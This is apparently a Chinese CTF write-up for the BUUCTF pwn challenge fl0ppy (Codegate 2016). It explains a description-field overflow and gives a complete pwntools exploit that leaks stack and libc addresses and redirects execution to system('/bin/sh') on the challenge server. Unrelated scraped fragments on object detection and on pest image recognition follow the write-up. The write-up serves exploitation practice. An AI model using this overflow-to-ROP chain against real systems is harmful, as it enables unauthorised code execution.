[BUUCTF-pwn] fl0ppy_codegate_2016

一个不算复杂的问题把自己整晕了

程序虽然用到堆但是与堆无关,有两个floppy可选,功能有选择盘,写入(建堆块写入指针,desc写内容),show和修改4个功能。其中修改的时候desc原长度为0xc实际可写入0x25有个溢出。并且长度足够情况下strncpy并不带尾部的\0 

char *__cdecl m4edit(int a1)
{
  char *result; // eax
  char s[1024]; // [esp+8h] [ebp-410h] BYREF
  int v3; // [esp+408h] [ebp-10h] BYREF
  size_t v4; // [esp+40Ch] [ebp-Ch]

  v3 = 0;
  v4 = 0;
  memset(s, 0, sizeof(s));
  if ( !*(_DWORD *)a1 )
  {
    puts("Floppy disk is unusable.\n");
    exit(-1);
  }
  puts("Which one do you want to modify? 1 Description | 2 Data\n");
  _isoc99_scanf("%d", &v3);
  IO_getc(stdin);
  if ( v3 == 1 )
  {
    puts("Input Description: \n");
    read(0, s, 0x25u);
    v4 = strlen(s);
    result = strncpy((char *)(a1 + 8), s, v4 - 1);// 原长12写入len(s)-1 !!!
  }
  else
  {
    if ( v3 != 2 )
    {
      puts("Baaaaaaaaaack.\n");
      exit(-1);
    }
    puts("Input Data: ");
    read(0, s, 0x200u);
    *(_DWORD *)(a1 + 20) = strlen(s);
    result = strcpy(*(char **)(a1 + 4), s);     // 写入 s + \0
  }
  return result;
}

思路:

  1. 通过修改功能写入到v8,然后show的时候带出v8 得到栈地址
  2. 如果写到0x20就能带出libc_start_main_ret
  3. 溢出这块最多0x25写不了rop,所以通过floppy2的溢出修改floppy1的堆指针指到ret然后写入rop

两个坑点:

  1. esp在下断点后发现比ida里看的小8
  2. 能看到两个libc_start_main 第一个恰在ebp后,但这个不是返回地址,返回地址在下一个+0x10处
  3. 由于返回地址比预想的大,直接修改desc溢出达不到写rop的位置,所以需要修改data指针。再通过写data达到写rop的目的。
from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF("/home/shi/libc6-i386_2.23-0ubuntu11.3/libc-2.23.so")
    one = [0x3a81c,0x3a81e,0x3a822,0x3a829,0x5f075,0x5f076]
    offset_main_ret = 0x18647
else:
    p = remote('node4.buuoj.cn', 27005) 
    libc_elf = ELF('../libc6-i386_2.23-0ubuntu10_amd64.so')
    one = [0x3a80c,0x3a80e,0x3a812,0x3a819,0x5f065,0x5f066]
    offset_main_ret = 0x18637

elf = ELF('./pwn')
context(arch='i386')

'''
0036| 0xffffd134 --> 0x1    //floppy1.flag
0040| 0xffffd138 --> 0x5655a410 ("AAAAAAAA\n")  //floppy1.data_ptr
0044| 0xffffd13c ("BBBBBBBB\n")   //floppy1.desc
0048| 0xffffd140 ("BBBB\n")
0052| 0xffffd144 --> 0xffff000a --> 0x0 
0056| 0xffffd148 --> 0x9 ('\t')   //floppy1.length
0060| 0xffffd14c --> 0xffffd134 --> 0x1   // v8 current_floppy
0064| 0xffffd150 --> 0xffffd170 --> 0x1   
0068| 0xffffd154 --> 0x0 
0072| 0xffffd158 --> 0x0 
0076| 0xffffd15c --> 0xf7e36647 (<__libc_start_main+247>:) //fake_ret
'''

menu = b">\n"
def change_disk(idx):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"Which floppy do you want to use? 1 or 2?\n\n", str(idx).encode())

def add():
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"Input your data: \n\n", b'AAA')
    p.sendlineafter(b"Description: \n\n", b'AAA')

def show():
    p.sendlineafter(menu, b'3')

def edit(msg):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b'Which one do you want to modify? 1 Description | 2 Data\n', b'1')
    p.sendafter(b"Input Description: \n\n", msg)

def edit2(msg):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"Which one do you want to modify? 1 Description | 2 Data\n\n", b'2')
    p.sendafter(b"Input Data: \n", msg)

context.log_level='debug'

change_disk(1)
add()

#leak v8 current_floppy
edit(b'A'*0x11)
change_disk(1)
show()
p.recvuntil(b'A'*0x10)
stack = u32(p.recv(4))
print('stack:', hex(stack))

#edit floppy2.desc floppy1.data_ptr->libc_start_main_ret
change_disk(2)
add()
edit(b'A'*0x14 + p32(stack +0x38) + b'\n') #floppy1->data->stack:ret

change_disk(1)  
show()
p.recvuntil(b'DATA: ')
libc_base = u32(p.recv(4)) - offset_main_ret
print('libc:', hex(libc_base))
system = libc_base + libc_elf.sym['system']
bin_sh = libc_base + next(libc_elf.search(b'/bin/sh'))

edit2(p32(system)+b'A'*4+p32(bin_sh))

p.sendlineafter(menu, b'5')

p.sendline(b'cat /flag')
p.interactive()

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
1 目标检测的定义 目标检测(Object Detection)的任务是找出图像中所有感兴趣的目标(物体),确定它们的类别和位置,是计算机视觉领域的核心问题之一。由于各类物体有不同的外观、形状和姿态,加上成像时光照、遮挡等因素的干扰,目标检测一直是计算机视觉领域最具有挑战性的问题。 目标检测任务可分为两个关键的子任务,目标定位和目标分类。首先检测图像中目标的位置(目标定位),然后给出每个目标的具体类别(目标分类)。输出结果是一个边界框(称为Bounding-box,一般形式为(x1,y1,x2,y2),表示框的左上角坐标和右下角坐标),一个置信度分数(Confidence Score),表示边界框中是否包含检测对象的概率和各个类别的概率(首先得到类别概率,经过Softmax可得到类别标签)。 1.1 Two stage方法 目前主流的基于深度学习的目标检测算法主要分为两类:Two stage和One stage。Two stage方法将目标检测过程分为两个阶段。第一个阶段是 Region Proposal 生成阶段,主要用于生成潜在的目标候选框(Bounding-box proposals)。这个阶段通常使用卷积神经网络(CNN)从输入图像中提取特征,然后通过一些技巧(如选择性搜索)来生成候选框。第二个阶段是分类和位置精修阶段,将第一个阶段生成的候选框输入到另一个 CNN 中进行分类,并根据分类结果对候选框的位置进行微调。Two stage 方法的优点是准确度较高,缺点是速度相对较慢。 常见Tow stage目标检测算法有:R-CNN系列、SPPNet等。 1.2 One stage方法 One stage方法直接利用模型提取特征值,并利用这些特征值进行目标的分类和定位,不需要生成Region Proposal。这种方法的优点是速度快,因为省略了Region Proposal生成的过程。One stage方法的缺点是准确度相对较低,因为它没有对潜在的目标进行预先筛选。 常见的One stage目标检测算法有:YOLO系列、SSD系列和RetinaNet等。 2 常见名词解释 2.1 NMS(Non-Maximum Suppression) 目标检测模型一般会给出目标的多个预测边界框,对成百上千的预测边界框都进行调整肯定是不可行的,需要对这些结果先进行一个大体的挑选。NMS称为非极大值抑制,作用是从众多预测边界框中挑选出最具代表性的结果,这样可以加快算法效率,其主要流程如下: 设定一个置信度分数阈值,将置信度分数小于阈值的直接过滤掉 将剩下框的置信度分数从大到小排序,选中值最大的框 遍历其余的框,如果和当前框的重叠面积(IOU)大于设定的阈值(一般为0.7),就将框删除(超过设定阈值,认为两个框的里面的物体属于同一个类别) 从未处理的框中继续选一个置信度分数最大的,重复上述过程,直至所有框处理完毕 2.2 IoU(Intersection over Union) 定义了两个边界框的重叠度,当预测边界框和真实边界框差异很小时,或重叠度很大时,表示模型产生的预测边界框很准确。边界框A、B的IOU计算公式为: 2.3 mAP(mean Average Precision) mAP即均值平均精度,是评估目标检测模型效果的最重要指标,这个值介于0到1之间,且越大越好。mAP是AP(Average Precision)的平均值,那么首先需要了解AP的概念。想要了解AP的概念,还要首先了解目标检测中Precision和Recall的概念。 首先我们设置置信度阈值(Confidence Threshold)和IoU阈值(一般设置为0.5,也会衡量0.75以及0.9的mAP值): 当一个预测边界框被认为是True Positive(TP)时,需要同时满足下面三个条件: Confidence Score > Confidence Threshold 预测类别匹配真实值(Ground truth)的类别 预测边界框的IoU大于设定的IoU阈值 不满足条件2或条件3,则认为是False Positive(FP)。当对应同一个真值有多个预测结果时,只有最高置信度分数的预测结果被认为是True Positive,其余被认为是False Positive。 Precision和Recall的概念如下图所示: Precision表示TP与预测边界框数量的比值 Recall表示TP与真实边界框数量的比值 改变不同的置信度阈值,可以获得多组Precision和Recall,Recall放X轴,Precision放Y轴,可以画出一个Precision-Recall曲线,简称P-R
图像识别技术在病虫害检测中的应用是一个快速发展的领域,它结合了计算机视觉和机器学习算法来自动识别和分类植物上的病虫害。以下是这一技术的一些关键步骤和组成部分: 1. **数据收集**:首先需要收集大量的植物图像数据,这些数据包括健康植物的图像以及受不同病虫害影响的植物图像。 2. **图像预处理**:对收集到的图像进行处理,以提高后续分析的准确性。这可能包括调整亮度、对比度、去噪、裁剪、缩放等。 3. **特征提取**:从图像中提取有助于识别病虫害的特征。这些特征可能包括颜色、纹理、形状、边缘等。 4. **模型训练**:使用机器学习算法(如支持向量机、随机森林、卷积神经网络等)来训练模型。训练过程中,算法会学习如何根据提取的特征来识别不同的病虫害。 5. **模型验证和测试**:在独立的测试集上验证模型的性能,以确保其准确性和泛化能力。 6. **部署和应用**:将训练好的模型部署到实际的病虫害检测系统中,可以是移动应用、网页服务或集成到智能农业设备中。 7. **实时监测**:在实际应用中,系统可以实时接收植物图像,并快速给出病虫害的检测结果。 8. **持续学习**:随着时间的推移,系统可以不断学习新的病虫害样本,以提高其识别能力。 9. **用户界面**:为了方便用户使用,通常会有一个用户友好的界面,显示检测结果,并提供进一步的指导或建议。 这项技术的优势在于它可以快速、准确地识别出病虫害,甚至在早期阶段就能发现问题,从而及时采取措施。此外,它还可以减少对化学农药的依赖,支持可持续农业发展。随着技术的不断进步,图像识别在病虫害检测中的应用将越来越广泛。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值